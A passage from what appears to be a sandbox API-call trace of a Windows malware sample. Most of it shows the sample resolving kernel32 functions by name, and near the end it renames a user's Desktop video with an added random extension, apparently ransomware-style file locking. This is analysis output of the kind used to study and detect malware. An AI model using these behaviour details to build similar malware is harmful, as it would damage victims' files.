lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.101] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.101] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.101] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.101] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.101] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.102] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.102] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.102] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.102] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.102] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.102] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.102] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.102] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.102] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.102] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.102] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.102] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.102] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.102] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.102] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.102] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.102] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.102] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.102] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.103] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.103] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.103] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.103] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.103] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.103] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.103] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.103] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.103] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.103] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.103] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.103] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.103] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.103] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.103] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.103] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.103] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.103] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.103] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.104] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.104] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.104] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.104] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.104] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.104] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.104] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.104] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.104] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.104] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.104] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.104] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.104] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.104] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.104] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.104] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.104] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.104] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.104] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.105] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.105] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.105] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.105] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.105] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.105] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.105] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.105] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.105] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.105] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.105] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.105] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.105] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.105] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.105] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.105] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.105] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.105] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.105] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.106] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.106] lstrlenA (lpString="DELETEATOM") returned 10 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.106] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.106] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.106] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.106] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.106] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.106] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.106] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.106] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.106] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.106] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.106] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.106] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.106] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.106] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.106] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.106] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.106] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.107] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.107] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.107] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.107] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.107] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.107] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.107] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.107] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.107] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.107] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.107] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.107] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.107] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.107] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.107] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.107] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.107] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.107] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.107] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.107] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.108] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.108] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.108] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.108] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.108] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.108] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.108] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.108] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.108] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.108] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.108] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.108] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4") returned 73 [0083.108] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4.kWv2Z") returned 79 [0083.108] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\w6py.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4.kWv2Z" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\w6py.mp4.kwv2z"), dwFlags=0x0) returned 1 [0083.109] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.109] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.109] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.109] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c227300, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0xf59226f0, ftLastAccessTime.dwHighDateTime=0x1d4c8bc, ftLastWriteTime.dwLowDateTime=0xf59226f0, ftLastWriteTime.dwHighDateTime=0x1d4c8bc, nFileSizeHigh=0x0, nFileSizeLow=0xa568, 